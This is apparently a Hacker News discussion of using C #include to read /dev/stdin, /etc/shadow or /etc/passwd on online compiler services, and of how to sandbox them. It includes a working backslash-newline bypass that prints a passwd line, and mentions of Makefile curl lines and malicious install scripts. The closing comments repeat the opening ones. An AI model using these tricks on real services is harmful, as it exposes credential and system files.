> Recently I saw a tweet where someone mentioned that you can include /dev/stdin in C code compiled with gcc. This is, to say the very least, surprising.
You can also call something to read from stdin in your Makefile, or read from stdin in your executable.
> But is it equally obvious that the compiler also needs to be sandboxed?
Yes. Why wouldn't it be sandboxed?!
> I even found one service that ... showed me the hash of the root password.
Wow. That's bad. Of course, that's not a compiler issue, but rather a system administration issue. /etc/shadow should not be world-readable.
> This effectively means this service is running compile tasks as root.
That's quite a leap from 'I can read /etc/shadow' to 'I am root'.
> Interestingly, including pseudo-files from /proc does not work. It seems gcc treats them like empty files.
More accurately, it seems the system treats them like empty files. gcc does a stat on the file, which returns 'regular file' and 'size=0'. gcc therefore calls read() with a length of 0 bytes.
> That's quite a leap from 'I can read /etc/shadow' to 'I am root'.
Of all the leaps in that post, that's the least leapy thing. `shadow` exists precisely so that only `root` can read its content, whereas before said content resided in `passwd` which _needs_ to be readable by all.
I see only two possibilities here. Either the people who set up that compile service are complete morons and run said compile as actual root in an actual VM; OR, more likely, shit runs in a container with an _apparent_ id of 0 but no actual privilege outside its temporary environment.
Running as actual root in a VM would be my preferred design. There are lots of times a user might need to apt-get some dependencies for their compile job. Let an attacker do whatever they like in the VM. Then delete the VM between users.
Docker containers aren't really a good security barrier, and a VM is much better (although VM escape vulnerabilities aren't unheard of).
> I did not see any relevant content on the websites you mention in your HN profile
At least I have a filled out profile, unlike you.
Besides that, and the cheap personal attacks, you seem to be completely missing the point so let me spell it out for you: VMs, containers, chroot jails and all those other tools with which we can try to isolate two pieces of software running on the same hardware all have exploits, past, current and future ones. Any piece of software of even moderate complexity will have bugs, any isolation method should be considered fallible and leaky and you best defenses will take that into consideration when architecting your setup.
If you don't then sooner or later someone with more patience, a larger budget or more knowledge than you will get the better of you with all the consequences that may have.
The idea is that virtualization escape vulnerabilities are quite frequent. An attacker might not have one on hand at any given moment and you might patch your system frequently when they become known.
But this only means a determinated attacker that has emulated root needs only patience. Good security always means stacked independent layers, betting the farm only on the guarantees of your VM is very unsafe.
Running in a VM is good. Running in a VM as a non-priv user is better. Ideally you'd want multiple layers of defense in case of undiscovered gaps, human error and 0-days.
>That's quite a leap from 'I can read /etc/shadow' to 'I am root'.
Is it? There are alternatives of course but I would say that without further clues that seems the most likely explanation.
I agree with the rest of your points though. In general it seems fairly obvious that build systems should be sandboxed if they're building "foreign" code, after all if you can mess with the source code you can probably affect the build system as well, and from there you can basically do anything you want.
> More accurately, it seems the system treats them like empty files.
The reason is that the content is generated by a callback that the kernel calls, and the kernel does not want the content to be generated just in order to stat(2) the file, so it shows a zero length, and assumes that things like /bin/cat will just read(2) until EOF is returned, without trying to be too smart.
If that was my server I would of course put a joke in /etc/shadow - did you try to brute force the hashes? It would not be a great surprise to find some obvious funny content if you try?
That's a pretty long passphrase, so someone would have to have put it in the word list directly to ever guess something that long. Would be fun though.
Its interesting tangent that the "confused deputy" security problem was first identified in a compiler, back in the days when people paid to have their code compiled. This led towards "capabilities" and lots of operating system design that is now in vogue again.
(this #include problem can be thought of as a confused deputy vulnerability. The compiler shouldn't have the capability to read the password file, and if it did, it is a confused deputy to be wielding that cap on behalf of its user, instead of wielding the caps it gets from the user).
Its sad that the links to Norm Hardy's original write-up all seem broken.
Henry Levy's 1984 book "Capability-Based Computer Systems" -- a survey and description of early object-based and capability-based processors and operating systems -- is available here:
Compiling untrusted code is already a dangerous affair. Compilers are not audited for security vulnerabilities, and many versions of popular compilers have contained memory corruption bugs or similar issues that could be leveraged to gain code execution. Many services that compile untrusted code will run the resulting binaries too, which definitely requires a sandbox or disposable VM - at which point you may as well throw your whole compiler in the sandbox/VM too.
I find it more likely that the "root" user mentioned in this post is the root user of some disposable Docker container, which would be the right way to run a compiler-as-a-service.
> I find it more likely that the "root" user mentioned in this post is the root user of some disposable Docker container, which would be the right way to run a compiler-as-a-service.
My understanding is that Docker isn't something you use if you really want security.
You're being downvoted but you're right- Docker really isn't a good choice for running untrusted and potentially hostile code, since a container breakout zero-day pretty much immediately compromises the host OS. (Even with user namespace remapping a breakout still gives enough access to get up to shenanigans.)
At the minimum a disposable VM using something like KVM/QEMU/Firecracker would be a start. That way you have kernel isolation down to the hardware which is much less likely to be exploitable.
The attack surface of a hypervisor is tiny, in comparison.
There was 'interesting' research out of IBM a couple of years ago where they claimed they found that containers with good seccomp profiles etc were 'as secure as' a VM. Well, nobody goes around believing that.
I recall once asking Joanna Rutkowska this same question, I think just days after she had outlined some pretty glaring security issues in the Xen hypervisor. She pointed out that if we were finding (and fixing) security issues in the 2K (or 20K, or however big the trusted-computing-base of Xen is, I forget) then imagine the number of issues laying unfound in your modern kernel...?
> There was 'interesting' research out of IBM a couple of years ago where they claimed they found that containers with good seccomp profiles etc were 'as secure as' a VM. Well, nobody goes around believing that.
You're leaving out a key detail of that research. They never said that tuning seccomp profiles to secure existing containerized apps is practical or effective. In fact, quite the opposite. IIRC, what they actually did is to create a hypervisor-like narrow interface on top of containers by restricting the available system calls to closely resemble KVM's hypercall interface. This design allowed the authors to reduce the size of the trusted computing base while avoiding overheads associated with VMs, though it would also limit the ability to run unmodified Linux binaries. Overall, I found it to be an interesting alternative to containers or VMs.
Funny you say the docker is not for security (it’s there in the manual) but then suggest chroot of all things — that is just as well documented as not being meant for security!
The point is that neither tool has a security focus, any security characteristics they might have are incidental and not at all guaranteed, and so neither should be used for that purpose.
This is true, but containers are so much better than nothing and relatively simple to use, so if someone isn't going to put in the effort for a more secure solution I'd rather they use Docker than nothing.
Yes, Docker largely became popular because of its user friendliness. Running a containerized compile job can be quickly done in a single command (e.g. docker run --rm -v "$(pwd):/src" -t ownyourbits/mmake).
Why not? There's a good chance the user will be needing to install extra packages or libraries, or run custom makefile steps that require extra permissions the system designer couldn't anticipate.
Running as root I think is the exact thing to run as. Then throw the whole VM or container away when handling a request for another user.
Running a compiler as root in general is not recommended. It's the principle of least privilege. Running without unnecessary privileges is a good idea for the same reason running in a sandbox is a good idea.
Custom makefile steps that require running the compiler as root? More likely they need to run `chown` or `chmod` or something else as root -- i.e., something that has a far smaller attack surface.
Sure some can, but if you're making a compiler-as-a-service, you want it to be compatible with as many as possible. I suspect being root maximizes compatibility. Hardcoded "/usr/bin" paths are just the start...
On a related note, the XML standard defines a way to include external files in the document. If you come across a service which replies with a part of your request(e.g. validation errors) and uses XML parser with this feature turned on, which is true by default in many cases, this can be used to read arbitrary files. I wonder how many poorly maintained enterprise systems systems are vulnerable to that.
About a year and a half ago it was a very common vulnerability to find when doing web application assessments. Especially if uploading Excel spreadsheets was somehow involved.
Its less common now that most major parsers are turning this feature off by default though.
XXE is a feature that never should have happened. Whoever decided that not only should it be a thing, but that it should be enabled by default, needs to have their keyboard taken away.
> is it equally obvious that the compiler also needs to be sandboxed?
I would NEVER expect that one can run a C or C++ compiler on arbitrary input safely. There are so many potential attack vectors and, unless the authors have gone out of their way extensively to prevent them, it seems very likely they would suffer from buffer overflows, leaking memory to callers, and in the worst case arbitrary code execution.
I doubt any one of these websites is safe unless using very strict validation or disposable VMs/hardware in some way.
This seems contrived. So you need to send someone "evil" code that they won't read, have them compile it as root, and then ship you the resulting binary.
I wouldn't read too much into it "working" with some kind of compile/show service, as they could have been using non-persistent containers.
Ultimately this seems like social engineering i.e. "Tricking privileged users into doing <bad thing> as root." Might have well ask them to cat /etc/shadow and email you the "nonsense" it prints.
People compile unread code all the time. Having them send the binary back is a little unusual though. But nothing says the resulting binary can’t open its own socket when its first run. There are lots of exfiltration options.
Getting them to run make as root would be pretty easy. People are already conditioned to run “sudo make install”.
A good mitigation is to install software by user so root privileges aren’t needed at any step of the process.
Restricted user accounts don't keep us secure - if you run malicious software even as a regular desktop user, there's tons of ways for it to get root, or do damage/get valuable data without it. What keeps us safe, usually, is a web of trust that involves package managers and websites. A vulnerability like this is only a problem if there is a threat model that sidesteps the usual web-of-trust mechanisms we use. In your specific variant, someone gets a source tarball from a weird place and runs 'make' as root on its Makefile - at that point, #include shenanigans are entirely redundant.
Basically, what this is is a very strained local privilege escalation exploit for a workstation machine. I don't think those are very interesting because are a bazillion of them - notably you can simply drop an alias to sudo in .profile.
as one of the commands under the "install" target in the Makefile. That way you aren't dependent on the other guy running his C compiler as root (why?!). Just make sure the Makefile is some horribly mangled mess built by ./configure or something so nobody will be tempted to read it.
It will almost certainly take longer for someone to read your Makefile to notice that weird curl line than it would be for someone to try to compile your code as a regular user and have the compiler spit out an error because it can't read the include file "/etc/shadow".
Have make suppress error messages for the .o including it. You can have another file implement any missing symbols with a weak attribute so the linker will not complain if your evil object file fails to be built.
If you go with C++ then you have an entire Turing complete language executed at compile time to do whatever nasty thing your heart desires.
I agree there are much easier alternatives... but it's an intellectually interesting attack vector.
I don't think it is that contrived. I've contributed to a project that had bots build every GitHub pull request and post build+test logs in the comments.
Not only is it contrived, it's also compiler dependent[1]. I'd wager most compilers will simply copy the contents of the included file like gcc does, but all kinds of other stuff can happen.
Step 1 publish a node package that does something people would like
Step 2 whatever you like in the install script ;) like check if they have password less sudo
They're talking about reading compiler errors, so there won't be a binary to ship. If we could arrange for the code to compile correctly and then be executed, we wouldn't need the binary because the program itself could just upload all the password hashes.
It's something I use to measure certain things, like how many instructions does a C++ exception add etc.
It's run in a docker container, and I think I strip out any slashes from includes. I'm pretty sure the container is not executing stuff as root as well. Still, probably not bulletproof.
#include "\
/etc/passwd"
program221/code.cpp:1:11: warning: backslash-newline at end of file
1 | #include "\
|
In file included from program221/code.cpp:2:
/etc/passwd:1:5: error: found ':' in nested-name-specifier, expected '::'
1 | root:x:0:0:root:/root:/bin/bash
| ^
| ::
/etc/passwd:1:1: error: 'root' does not name a type
1 | root:x:0:0:root:/root:/bin/bash
| ^~~~
Is it possible to restrict the compiler's access to only files in "/usr/include" instead? Seems like it'd be hard to cover every case with just pattern matching.
It would be awesome if you could place restrictions on the compiler, but I don't know of any such features atm. Still, the compilation happens in the container (which is just a default Ubuntu image with a cross compiler in it). I don't know how much information there is to disclose. Not taking it lightly though, I guess I will have to find a way to really handle the preprocessor stuff, but I still want people to be able to include system headers.
> Is it possible to restrict the compiler's access to only files in "/usr/include" instead? Seems like it'd be hard to cover every case with just pattern matching.
Untrusted code execution in a Docker container is not exactly safe. Even if the runtime and container are optimally configured for security purposes (uncommon), container runtimes are not designed or particularly thoroughly evaluated for use as a security solution.
Virtually all Linux distributions sandbox their package build system using something like fakeroot.
Before the security reason the OP mentions, they don't want to screw the build tasks because of the host environment they are running on, or they don't want to screw the host directories when they make mistakes with installation paths.
fakeroot is not a sandbox, it's just a way to have tasks which normally expect to run as root (like setting file permissions during "make install", or creating a .tar.gz with the correct permissions) work without root. IIRC, it works through LD_PRELOAD, and it's very easy to bypass (just unset that environment variable).
This reminds me that in say, a *BSD ports tree, you end up pulling tarballs from the internet, extracting them and running make. (Granted there can be a hash on them so that's some verification)
But an exploit using that would likely sooner just write something malicious in the Makefile if it wants to compromise the build machine. Targeting the compiler for such a goal seems like it would be harder.
There’s the mandatory hash, but generally speaking: that’s how you build software on Unix/Linux; there’s no way around it. You can do what Poudriere automatically does on FreeBSD, which is doing the whole thing in a dedicated jail.
If the output from the compiler is a binary object (.o) instead of the assembly (.s), I'd use gcc's inline assembly extension to call the GNU assembly ".incbin" directive (plus the necessary directives to put it in the correct section with an exported symbol).
The godbolt compiler explorer, which is awesome btw, had to tackle all sorts of problems like this. I think there is a talk on YouTube that goes into some detail.
Sandboxing your build is good practice anyway, for this and many other reasons :) For bonus points, build each major component in its own sandbox and integrate them later. That allows you to tightly control your dependencies (which makes your project tidier and makes incremental builds faster), and it paves the way to reproducible builds.
If you can include /etc/shadow you can also just cat it. curl|sh software installations are far more of a threat than potentially a malicious c per-processor statement.
> There are plenty of webpages that offer online services where you can type in C code and run it. It is obvious that such systems are insecure if the code running is not sandboxed in some way. But is it equally obvious that the compiler also needs to be sandboxed?
Neither of the individual facts is surprising. It is the juxtaposition that is. In 20 years of writing C/C++ code, I had never thought of #including files such as /dev/stdin.
Of course, I know how the #include mechanism works, and what the special device files do, so I can anticipate the results of #include </dev/stdin>, but it is unusual enough that I had to write a small test program to see for myself.
It used to be the case that programmers were simply another step up from "power user", and as such would've already become familiar with such aspects of the system. Now, people are "learning to code" with barely any basic computer literacy, and the situation is even worse thanks to opaque locked-down platforms like mobile, so that a lot of them unfortunately have only a vague notion of what a file is, much less the whole "devices are also files" paradigm that underlies Unix (and to a certain extent, Windows --- but how many Windows programmers know about CON?)
I've surprised some coworkers -- ones who are definitely not inexperienced or just learning -- by e.g. using /dev/stdout as a logfile, or even /dev/pts/x to have multiple logs directly written to separate terminal windows. They all "knew" that devices are files, but never thought about actually trying to use them as such.
> Why is this surprising? Do programmers not read books anymore? [...]
No need to be condescending. Three reasons:
1) A sophisticated compiler might read the length of a file before loading it, so that it can allocate a buffer of the right size. Doesn't work with /dev/stdin.
2) Alternatively, it might read the file via mmap(). Doesn't work with /dev/stdin.
3) Furthermore, it might check whether the file is a regular file. If not, it is almost certainly not what the programmer had in mind.
> 1) A sophisticated compiler might read the length of a file before loading it, so that it can allocate a buffer of the right size. Doesn't work with /dev/stdin.
gcc does this. It appears to be why /proc files don't work. gcc sees that stat calls it a 'regular file' and 0 bytes long, and actually performs a read() syscall with a length of 0.
> 3) Furthermore, it might check whether the file is a regular file. If not, it is almost certainly not what the programmer had in mind.
gcc probably does this. (It would explain why /dev/stdin works)
Nix won't help you secure your system from untrusted code written by internet script kiddies. It's a build tool and simply isn't designed for such things.
That only works if you can turn your entire web application into a Nix build process, which is unrealistic at best. Nix is wonderful as a build tool, but it's quite a stretch to assume it's adequate for securing running applications. Plain containers, or even better, VMs are more suited for that purpose.
Counter point, why should '/' be invalid? I'm not saying it's good practice or that the compiler shouldn't warn you, but "/home/me/path_to_thing/file" is a perfectly valid path.
An absolute path is a valid path on the filesystem. But the compiler should be searching according to its implementation dependent search paths, when doing <>. Not prepending the searchpath (and not rejecting) for absolute paths is an implementation choice I personally think is wrong for a C compiler. But it may be able to do so I guess as you can also do "..".
You can also call something to read from stdin in your Makefile, or read from stdin in your executable.
> But is it equally obvious that the compiler also needs to be sandboxed?
Yes. Why wouldn't it be sandboxed?!
> I even found one service that ... showed me the hash of the root password.
Wow. That's bad. Of course, that's not a compiler issue, but rather a system administration issue. /etc/shadow should not be world-readable.
> This effectively means this service is running compile tasks as root.
That's quite a leap from 'I can read /etc/shadow' to 'I am root'.
> Interestingly, including pseudo-files from /proc does not work. It seems gcc treats them like empty files.
More accurately, it seems the system treats them like empty files. gcc does a stat on the file, which returns 'regular file' and 'size=0'. gcc therefore calls read() with a length of 0 bytes.